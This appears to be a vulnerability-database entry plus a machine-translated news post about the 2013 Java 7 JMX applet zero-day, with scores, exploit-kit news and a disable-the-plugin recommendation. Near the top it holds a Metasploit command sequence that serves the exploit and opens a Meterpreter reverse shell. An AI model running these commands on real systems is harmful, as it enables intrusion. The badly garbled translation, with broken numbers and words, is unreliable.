10 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
0.975 High
EPSS
Percentile
100.0%
1 1: The 0 0 UPDATE: MSF has been updated related to penetration testing module
use exploit/windows/browser/ie_cbutton_uaf
use exploit/multi/browser/java_jre17_jmxbean set SRVHOST 192.168.178.26 set TARGET 1 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.178.26 exploit
sysinfo
getuid
More links and video:
<http://eromang.zataz.com/2013/01/10/java-applet-jmx-0day-remote-code-execution-metasploit-demo/>
The beginning of the year, people still immersed in the festive atmosphere, the Java and giving away to everyone a Hao Li, so you like joy, have a great year. Recently, Java and explosion a new 0day that may allow an attacker to access the Computer Management Permissions, Java 7 Update 1 0 or earlier in the presence of the vulnerability, the vulnerability can allow a remote, unauthenticated attacker on the victim system to execute arbitrary code, the vulnerability is first in theβMalware Donβt Need Coffeeβblog.
Currently the vulnerabilities in the network there are two EXP,respectively, sold price for 7 0 0 and $ 1 5 0 0 dollars, in August last year foundCVE-2 0 1 2-4 6 8 1vulnerabilities in using a similar approach, view address.
Two EXP used by hackers to spread malicious software, the famous foreign Black Kit BlackHole Exploit Kit and Cool Exploit Kit has been updated with the EXP.
BlackHole author Paunch yesterday in the network published, said in a BlackHole add the JAVA 0day is sent to the Software User The New Year welfare, the AlienVault Labsconfirm, the BlackHole tool used in EXP confirmed for Java latest vulnerability.
US-CERT also issued a[VU#6 2 5 6 1 7 warning](<http://www.kb.cert.org/vuls/id/625617> a). Untrusted Java applet by calling the setSecurityManager()function to elevate permissions, so in the absence of code signatures obtained in the case of full privileges and.
More intercepted the attack of the sample please see:
<http://malware.dontneedcoffee.com/2013/01/0-day-17u10-spotted-in-while-disable.html>
The vulnerability distribution is as follows:
Currently recommendations can only disable the browser Java plugin to guard against the vulnerability attack: